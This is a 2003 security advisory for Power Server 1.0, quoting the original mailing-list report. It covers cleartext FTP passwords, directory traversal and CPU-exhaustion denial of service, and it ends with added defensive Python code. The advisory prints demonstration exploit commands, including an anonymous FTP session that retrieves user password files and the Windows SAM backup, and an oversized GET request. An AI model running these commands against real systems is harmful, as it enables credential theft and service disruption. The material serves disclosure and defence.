Power Server Discloses Passwords and Files to Remote Users
SecurityTracker Alert ID: 1007021
SecurityTracker URL: http://securitytracker.com/id/1007021
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jun 19 2003
Impact: Denial of service via network, Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included: Yes
Version(s): 1.0
Description:
Several vulnerabilities were reported in Power Server. A remote user can view user passwords and files on the system and can introduce denial of service conditions.
Ziv Kamir reported that the FTP server stores usernames and passwords in clear text in the 'C:\Program Files\html-helper\Power Server\Addons\FTPUsers' directory. The password resides in a user-specific file in that directory. A local user can view the passwords (and, due to a directory traversal flaw described below, a remote authenticated FTP user can also view the passwords).
It is also reported that a remote authenticated user, including an anonymous user, can access the FTP service to view specified files located outside of the FTP root directory. Some demonstration exploit commands are provided:
ls "C:/Program Files/html-helper/Power Server/Addons/FTPUsers/"
get "C:/Program Files/html-helper/Power Server/Addons/FTPUsers/user1.ini"
get "C:/winnt/repair/sam._"
It is also reported that a remote user can send a large HTTP GET request to cause the server to consume a large amount of CPU resources. A demonstration exploit request is provided:
GET '///// [500,000 times]'
A remote user can also reportedly connect to the FTP service and send a USER or PASS argument that is 50,000 characters or longer to cause the server to consume a large amount of CPU resources. The report indicates that the CWD, LS, and MKDIR commands can also be exploited in this manner.
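The traversal and the oversized-argument problems described above both come down to checks the FTP service did not make on client input. The following Python code is an added example, not Power Server code and not part of the original advisory; `FTP_ROOT`, `MAX_LINE`, the function names and the sample commands in the comments are assumptions. It caps the command line before parsing and maps every client path into a virtual tree under the FTP root, refusing drive-letter and UNC paths.

```python
import ntpath  # Windows path rules, usable on any host OS

FTP_ROOT = r"C:\ftproot"   # assumed FTP root directory (hypothetical)
MAX_LINE = 512             # assumed cap on one command line, in bytes
PATH_VERBS = {"CWD", "LIST", "NLST", "RETR", "MKD"}

class Rejected(Exception):
    """Carries the FTP reply sent instead of acting on the command."""

def parse_command(line: bytes):
    # Check the length first, so a 50,000-character USER/PASS/CWD
    # argument is dropped before any per-character work is done on it.
    if len(line) > MAX_LINE:
        raise Rejected("500 Command line too long.")
    verb, _, arg = line.decode("latin-1").rstrip("\r\n").partition(" ")
    return verb.upper(), arg

def resolve(cwd: str, arg: str) -> str:
    """Map a client path in the virtual tree to a real path under FTP_ROOT."""
    arg = arg.replace("/", "\\")
    drive, rest = ntpath.splitdrive(arg)
    if drive or ":" in rest:
        # "C:/Program Files/..." and UNC paths name a real volume: refuse.
        raise Rejected("550 Absolute paths are not permitted.")
    # Normalise inside the virtual tree; ".." above the root is clamped.
    virtual = ntpath.normpath(ntpath.join(cwd, rest))
    real = ntpath.normpath(FTP_ROOT + virtual)
    # Second check on the final path instead of trusting the steps above.
    root = ntpath.normcase(FTP_ROOT)
    if ntpath.normcase(ntpath.commonpath([FTP_ROOT, real])) != root:
        raise Rejected("550 Path is outside the FTP root.")
    return real

def check(line: bytes, cwd: str = "\\") -> str:
    """Return the confined path for a path command, 'ok', or the refusal."""
    try:
        verb, arg = parse_command(line)
        return resolve(cwd, arg) if verb in PATH_VERBS else "ok"
    except Rejected as exc:
        return str(exc)
```

The containment test here is lexical; a deployed server would also resolve junctions and symbolic links before comparing against the root.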
Impact:
A remote user can cause the server to consume a large amount of CPU resources.
A remote authenticated user, including an anonymous user, can view specified files on the system with the privileges of the FTP service. The user can view FTP account passwords.
A local user can view FTP account passwords.
Solution:
No solution was available at the time of this entry.
Vendor URL: www.html-helper.com/powerserver/default.asp
Cause: Access control error, Input validation error, Resource error
Underlying OS: Windows (Any)
Message History: None.
Source Message Contents
Date: 19 Jun 2003 18:17:00 +0200
Subject: [NT] Multiple Vulnerabilities in Power Server
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Vulnerabilities in Power Server
------------------------------------------------------------------------
SUMMARY
<http://www.html-helper.com/powerserver/whatserver.asp> Power Server is
"as you might have guessed a web server. But unlike most web servers,
Power server is open source, comes with tons of options, and has a ton of
features". Multiple vulnerabilities have been found in the product that allow
remote attackers to cause the server to no longer respond to legitimate
requests, read any files that are stored locally, and grab the usernames
and passwords stored under the server.
DETAILS
Vulnerable systems:
* Power Server version 1.0
Denial of Service in HTTP server:
A remote user can issue an HTTP GET request for '///// [500,000 times]'.
This will cause the server to consume large amounts of CPU time (88% - 95%).
Clear text passwords:
The FTP server add-on stores all usernames and passwords under the folder:
C:\Program Files\html-helper\Power Server\Addons\FTPUsers in clear text.
Under this folder you can find a file for each of the users and inside the
file their password.
Denial of Service in the FTP server:
A remote user can send a string of 50,000 characters or more as an
argument of the USER or PASS command, and cause the target server to
consume large amounts of CPU time (88% - 95%).
A remote authenticated user can cause the server to consume large amounts
of CPU time with the CWD, LS, and MKDIR commands in a very similar way.
Directory traversal in the FTP server:
A remote user with access to the FTP server, including anonymous access,
can traverse into directories outside those bounded by the FTP root, and
to download files by providing the complete path to the file (i.e.
c:\boot.ini).
Examples:
> ftp 10.10.10.1
220 PowerServer FTP Server ready.
User (10.10.10.1:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls c:/ ==> To View The Contents Of c:\
ftp> ls "C:/Program Files/html-helper/Power Server/Addons/FTPUsers/" ==>
To see a list of all the users under the FTP server
200 Port command successful.
150 Opening data connection for directory list.
.
..
Anonymous.ini
user1.ini
user2.ini
.
.
.
ftp> get "C:/Program Files/html-helper/Power Server/Addons/FTPUsers/user1.ini" ==> Retrieve the user's file with his password.
ftp> get "C:/winnt/repair/sam._"
ADDITIONAL INFORMATION
The information has been provided by <mailto:vulncode@yahoo.com> Ziv
Kamir.